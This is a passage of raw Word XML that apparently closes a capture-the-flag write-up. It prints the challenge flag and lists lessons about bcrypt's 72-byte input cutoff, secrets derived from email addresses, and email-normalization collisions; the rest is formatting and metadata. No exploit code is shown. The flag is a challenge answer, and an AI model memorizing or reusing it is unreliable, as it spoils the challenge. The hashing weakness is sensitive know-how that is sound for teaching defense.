    <w:p w14:paraId="6DACC8B0" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>[+] FLAG: ictf{8ee2ebc4085927c0dc85f07303354a05}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189C08E4" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:r w:rsidRPr="00CB4EC3">
        <w:pict w14:anchorId="2C023576">
          <v:rect id="_x0000_i1125" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="350DDD88" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB4EC3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Takeaways</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF887EA" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>Always be mindful of cryptographic library limits (bcrypt’s 72-byte cutoff).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C831039" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>Never base secrets on untrusted input like emails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B122A0F" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>Input normalization (normalize-email) can introduce unexpected collisions/shortcuts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E442A3" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:r w:rsidRPr="00CB4EC3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Final Flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DD421A" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="00CB4EC3" w:rsidRDefault="00CB4EC3" w:rsidP="00CB4EC3">
      <w:r w:rsidRPr="00CB4EC3">
        <w:t>ictf{8ee2ebc4085927c0dc85f07303354a05}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1798E0D9" w14:textId="77777777" w:rsidR="00CB4EC3" w:rsidRPr="000D4C0E" w:rsidRDefault="00CB4EC3"/>
    <w:sectPr w:rsidR="00CB4EC3" w:rsidRPr="000D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03B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BA1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D6891"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8AB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6C3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5F40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0BEC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0DD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F496E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="93F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2734"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="640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77AFD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FFD2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D5EB7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A996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45977"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C94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E07E2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3C2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77A3F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="24C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E21"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B3E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C5C72"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="947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7793D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BB9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8762D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FF14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E1165"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="02F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635CC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1E04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253EB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5E38E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D2701"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2018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07E46"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="18F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80BB1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4C2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0505A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C384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737F7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="889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90ABF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C4B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59EB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ACA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E6613"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8408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27F6E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D78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1280E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AA9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F357B4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DA3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E0EDA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FBB2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614BD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9646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1034E5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CB3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05023"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4FD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91A39"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5CD6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3385A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0EF6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DB1FBB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="011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B09A7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E30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12C6F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A76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85340"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1CC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51548"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="55B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20531"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BB9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F3F41"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AF6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7441">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="2089883563">
    <w:abstractNumId w:val="6"/>
    <w:lvlOverride w:ilvl="1">
      <w:lvl w:ilvl="1">
        <w:numFmt w:val="decimal"/>
        <w:lvlText w:val="%2."/>
        <w:lvlJc w:val="left"/>
      </w:lvl>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="601883133">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="398098125">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="4063680">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1725787248">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="915044517">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="592053061">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="891845785">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1421288853">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1902715087">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="566300608">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1443497004">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="490489123">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1696807976">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="2136094895">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="932055349">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1094325416">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1944262145">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="2032142246">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="370157117">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="554004958">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="373773209">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="170149783">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1113401261">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="709568765">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="254175391">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="1042096827">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="1340961397">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="1081558546">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="1370837571">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="319313352">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="748891633">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="1187913042">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="1160317449">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="715080007">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="249705035">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="38" w16cid:durableId="465198969">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="39" w16cid:durableId="1928028510">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="40" w16cid:durableId="1987317566">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="41" w16cid:durableId="2138643916">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="42" w16cid:durableId="373968682">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="43" w16cid:durableId="1857945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E2"/>
    <w:rsid w:val="000D4C0E"/>
    <w:rsid w:val="0030196E"/>
    <w:rsid w:val="005B2A08"/>
    <w:rsid w:val="005F1502"/>
    <w:rsid w:val="005F52EB"/>
    <w:rsid w:val="007B3178"/>
    <w:rsid w:val="0095727A"/>
    <w:rsid w:val="00B314E8"/>
    <w:rsid w:val="00BD09BA"/>
    <w:rsid w:val="00CB4EC3"/>
    <w:rsid w:val="00DF7C11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1FB2"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{77998CD5-B7DB-4B3E-A3D8-90FEEB73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45</Pages>
  <Words>5614</Words>
  <Characters>32005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Nazir Zikri Asrul Nizam</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Ahmad Nazir Zikri Asrul Nizam</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-09-06T10:18:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-08T10:29:00Z</dcterms:modified>
</cp:coreProperties>
</file>